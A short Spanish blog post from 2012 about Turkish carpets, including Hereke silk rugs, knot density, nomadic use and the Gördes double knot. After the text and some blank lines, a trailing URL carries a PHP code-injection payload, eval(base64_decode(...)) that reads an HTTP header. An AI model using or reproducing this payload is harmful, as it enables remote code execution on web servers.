miércoles, 11 de julio de 2012

Alfombras turcas

Los artículos turcos más preciados y conocidos en el mundo entero son las alfombras turcas, que constituyen un verdadero espectáculo de colores y diseños y están consideradas autenticas obras de arte. Así por ejemplo, las alfombras son típicas de las distintas regiones del país, y se distinguen no sólo por dibujos sino también por el material empleado: las de Hereke, procedentes de la ciudad homónima, se caracterizan por su rica decoración floral y por estar realizadas en seda. Las alfombras de Hereke están consideradas como las reinas de las alfombras turcas, y los suelos de los palacios y las mezquitas imperiales estaban adornados con sus ejemplos. La calidad se evalúa por la densidad y porque los nudos sean pequeños.
Los turcos usan alfombras desde hace siglos. Al ser enrollables y fáciles de transportar formaban parte esencial de la vida de los nómadas para evitar el frío del suelo de sus tiendas. Las chicas tejían para la dote de sus maridos cuando iban a casarse. Ahora tendrá la oportunidad de tener en su casa un recuerdo bien bonito, decorando algunas habitaciones de su casa con estas originales obras de arte hechas a mano, que son la mejor compra en su viaje a Estambul. Las alfombras persas tienen simple nudo y las alfombras turcas doble nudo, nudo turco o llamado Gördes, deriva su nombre al famoso Nudo Gordiano.








http://www.mundoturco.com/2009/05/20/alfombras-turcas/%&(%7B$%7Beval(base64_decode($_SERVER[HTTP_EXECCODE]))%7D%7D%7C.+)&%/

No hay comentarios:

Publicar un comentario